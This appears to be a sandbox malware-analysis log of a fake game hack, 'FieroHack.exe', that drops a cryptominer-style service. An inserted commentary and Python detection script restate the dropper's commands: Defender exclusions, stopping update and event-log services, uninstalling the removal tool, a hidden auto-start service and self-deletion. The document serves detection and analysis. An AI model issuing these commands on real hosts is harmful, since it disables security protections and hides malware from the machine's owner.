Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Users\user\Desktop\FieroHack.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\FieroHack.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: FieroHack.exe ReversingLabs: Detection: 48%
Source: FieroHack.exe Virustotal: Detection: 46%
Source: C:\Users\user\Desktop\FieroHack.exe File read: C:\Users\user\Desktop\FieroHack.exe
Source: unknown Process created: C:\Users\user\Desktop\FieroHack.exe "C:\Users\user\Desktop\FieroHack.exe"
Source: C:\Users\user\Desktop\FieroHack.exe Process created: C:\Users\user\AppData\Roaming\WeMod.exe C:\Users\user\AppData\Roaming\WeMod.exe
Source: C:\Users\user\AppData\Roaming\WeMod.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FieroHack.exe Process created: C:\Users\user\AppData\Roaming\Sirus.exe C:\Users\user\AppData\Roaming\Sirus.exe
Source: C:\Users\user\AppData\Roaming\WeMod.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Roaming\WeMod.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Roaming\WeMod.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WeMod.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WeMod.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WeMod.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WeMod.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Roaming\WeMod.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\AppData\Roaming\WeMod.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WeMod.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "BFFESVJT"
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "BFFESVJT" binpath= "C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe" start= "auto"
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "BFFESVJT"
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\WeMod.exe"
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\explorer.exe explorer.exe
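The process chain above is the same sequence twice: first from the dropped WeMod.exe, then from the service binary leirdnhqqedj.exe it registered as "BFFESVJT". Each step on its own is low-signal (an administrator may legitimately stop a service or change a power plan), but a Defender exclusion on the whole user profile and ProgramData, five update-related services plus the EventLog service stopped, all four sleep/hibernate timeouts zeroed, KB890830 (the Malicious Software Removal Tool) uninstalled, a service created with a binary under C:\ProgramData and a choice-delayed self-delete, all under one parent, is the standard cryptominer dropper pattern. The Python below is an added detection example written for this page, not Joe Sandbox code and not part of the report. It scores process-creation events per parent image so the weak steps add up, and it decodes a -EncodedCommand argument before matching so the same Add-MpPreference cmdlet is caught when it arrives base64-encoded instead of in the clear as seen here. The event tuples are constructed from the command lines in this report plus one encoded variant that is not in the report; the (parent, image, cmdline) layout, the rule weights and the alert threshold are assumptions of this example, not Sysmon or Joe Sandbox field names or scores.

```python
import base64
import re
from collections import Counter, defaultdict

# Rules for the dropper chain in this report: (name, regex applied to the
# lower-cased command line, weight). Weights and threshold are assumptions.
RULES = [
    ("defender_exclusion",
     re.compile(r"add-mppreference\b.*-exclusion(?:path|extension)"), 3),
    ("stop_update_services",
     re.compile(r"\bsc(?:\.exe)?\s+stop\s+(?:usosvc|waasmedicsvc|wuauserv|bits|dosvc)\b"), 1),
    ("stop_eventlog",
     re.compile(r"\bsc(?:\.exe)?\s+stop\s+eventlog\b"), 3),
    # KB890830 is the Malicious Software Removal Tool.
    ("uninstall_msrt",
     re.compile(r"\bwusa(?:\.exe)?\s+/uninstall\s+/kb:890830\b"), 3),
    ("disable_sleep",
     re.compile(r"\bpowercfg(?:\.exe)?\s+/x\s+-(?:hibernate|standby)-timeout-(?:ac|dc)\s+0\b"), 1),
    ("service_in_programdata",
     re.compile(r"\bsc(?:\.exe)?\s+create\s+\S+\s+binpath=\s*\"?c:\\programdata\\"), 3),
    ("self_delete",
     re.compile(r"\bchoice\s+/c\s+y\s+/n\s+/d\s+y\s+/t\s+\d+\s*&\s*del\b"), 2),
]
ALERT_THRESHOLD = 6  # one strong rule plus a few weak ones (assumption)

# powershell -e / -enc / -EncodedCommand <base64 of a UTF-16LE script>
ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_powershell(script: str) -> str:
    """Build the payload PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def expand_encoded(cmdline: str) -> str:
    """Append the decoded -EncodedCommand script so the rules can see it."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        script = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return cmdline
    return f"{cmdline} {script}"


def match_rules(cmdline: str) -> list:
    """Names of every rule that fires on one command line."""
    text = expand_encoded(cmdline).lower()
    return [name for name, rx, _ in RULES if rx.search(text)]


def score_by_parent(events) -> dict:
    """Sum rule weights per parent image: {parent: (score, {rule: hits})}."""
    weights = {name: w for name, _, w in RULES}
    hits = defaultdict(Counter)
    for parent, _image, cmdline in events:
        names = match_rules(cmdline)
        if names:
            hits[parent].update(names)
    return {p: (sum(weights[n] * c for n, c in ctr.items()), dict(ctr))
            for p, ctr in hits.items()}


def flag_droppers(events, threshold=ALERT_THRESHOLD) -> list:
    """Parent images whose aggregated score reaches the threshold."""
    return sorted(p for p, (score, _) in score_by_parent(events).items()
                  if score >= threshold)


# Constructed sample events mirroring the command lines in this report.
WEMOD = r"C:\Users\user\AppData\Roaming\WeMod.exe"
STAGE2 = r"C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe"
PS = r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
SC, CMD, PCFG = (r"C:\Windows\system32\sc.exe", r"C:\Windows\system32\cmd.exe",
                 r"C:\Windows\system32\powercfg.exe")
SAMPLE_EVENTS = [  # (parent image, image, command line)
    (WEMOD, PS, PS + " Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData)"
                     " -ExclusionExtension '.exe' -Force"),
    (WEMOD, CMD, CMD + " /c wusa /uninstall /kb:890830 /quiet /norestart"),
    (CMD, r"C:\Windows\system32\wusa.exe", "wusa /uninstall /kb:890830 /quiet /norestart"),
    *[(WEMOD, SC, f"{SC} stop {svc}") for svc in ("UsoSvc", "WaaSMedicSvc", "wuauserv", "bits", "dosvc")],
    *[(WEMOD, PCFG, f"{PCFG} /x -{k}-timeout-{p} 0") for k in ("hibernate", "standby") for p in ("ac", "dc")],
    (WEMOD, SC, f'{SC} delete "BFFESVJT"'),
    (WEMOD, SC, f'{SC} create "BFFESVJT" binpath= "{STAGE2}" start= "auto"'),
    (WEMOD, SC, f"{SC} stop eventlog"),
    (WEMOD, SC, f'{SC} start "BFFESVJT"'),
    (WEMOD, CMD, f'{CMD} /c choice /C Y /N /D Y /T 3 & Del "{WEMOD}"'),
    (CMD, r"C:\Windows\system32\choice.exe", "choice /C Y /N /D Y /T 3"),
    # Not in the report: the second stage hiding the same cmdlet behind -EncodedCommand.
    (STAGE2, PS, f"{PS} -EncodedCommand "
                 + encode_powershell("Add-MpPreference -ExclusionPath $env:ProgramData -Force")),
    (STAGE2, CMD, CMD + " /c wusa /uninstall /kb:890830 /quiet /norestart"),
    (STAGE2, SC, f"{SC} stop wuauserv"),
]

if __name__ == "__main__":
    for parent, (score, ctr) in score_by_parent(SAMPLE_EVENTS).items():
        print(f"{score:3d}  {parent}  {ctr}")
    print("flagged:", flag_droppers(SAMPLE_EVENTS))
```

On a real host the tuples come from Sysmon event 1 or Security 4688 (ParentImage, Image, CommandLine). Grouping by immediate parent is deliberately simple: in the sample, cmd.exe ends up with a score of 3 for the wusa.exe it spawned while WeMod.exe gets 23, so nested steps are under-counted unless you roll them up a pid tree to the root of the chain. The regexes key on arguments rather than image names, so renaming sc.exe or powercfg.exe does not evade them, but a command line that never reaches the log (for example a direct service-control API call) will.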
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\FieroHack.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: dwrite.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
      Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
